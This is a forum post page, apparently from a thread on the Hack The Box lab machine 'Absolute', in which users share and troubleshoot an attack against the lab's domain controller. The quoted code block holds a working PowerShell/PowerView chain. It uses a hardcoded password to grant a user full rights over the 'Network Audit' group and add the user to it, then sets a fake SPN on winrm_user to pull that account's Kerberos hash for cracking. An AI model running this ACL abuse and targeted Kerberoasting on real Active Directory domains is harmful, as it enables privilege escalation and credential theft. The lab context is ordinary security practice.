<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=528941#pid528941" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=528941#pid528941" title="RE: Absolute - HTB [Discussion]">#73</a></strong>
</div>
</div>
<span class="post_date"><span title="September 26, 2022, 02:39 PM">5 minutes ago</span> <span class="post_edit" id="edited_by_528941"></span></span>
</div>
<div class="post_body scaleimages" id="pid_528941">
<blockquote class="mycode_quote"><cite><span> (<span title="September 25, 2022">Yesterday</span>, 11:50 PM)</span>Hacker2222 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=524618#pid524618" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 25, 2022">Yesterday</span>, 11:46 PM)</span>jahman Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=524611#pid524611" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 25, 2022">Yesterday</span>, 11:34 PM)</span>Hacker2222 Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=524566#pid524566" rel="nofollow"></a></cite><blockquote class="mycode_quote"><cite><span> (<span title="September 25, 2022">Yesterday</span>, 10:27 PM)</span>jahman Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=524340#pid524340" rel="nofollow"></a></cite>Here is how a obtain the winrm_user hash, not cracked for now<br>
<br>
<div class="codeblock"><div class="body" dir="ltr"><code>$dc_domain="absolute.htb"<br>
<br/>
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force<br/>
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)<br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"<br/>
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb<br/>
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred<br/>
<br/>
<br/>
Set-DomainObject "CN=winrm_user,CN=Users,DC=absolute,DC=htb"  -Credential $Cred -Domain absolute.htb  -Server dc.absolute.htb  -SET @{"serviceprincipalname"="nonexistent/BLAHBLAH"}<br/>
Get-DomainUser  -Domain absolute.htb  -Server dc.absolute.htb  -Credential $Cred winrm_user  | Select serviceprincipalname<br/>
Get-DomainSPNTicket -Credential $Cred -SPN nonexistent/BLAHBLAH</br></code></div></div></br></br></blockquote><br/>
hmm getting bad credentials with powerview ..</blockquote><br/>
i changed a little bit the code (add a new Credential object  after adding the user to the network group) Hope it will good for you now.<br/>
<br/>
you need to  "Import-Module ActiveDirectory" and powerview, and the box is reseting the ad params very quick</blockquote><br/>
i mean the first command <br/>
<br/>
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"</blockquote><br/>
When I try to set the SPN, I get the following error: "WARNING: [Set-DomainObject] Error setting/replacing properties for object 'winrm_user' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied."<br/>
<br/>
Not sure what's wrong in my setup. I have the RSAT installed and everything.
				</div>
<div class="post_meta" id="post_meta_528941">
<div class="float_right">
</div>
</div>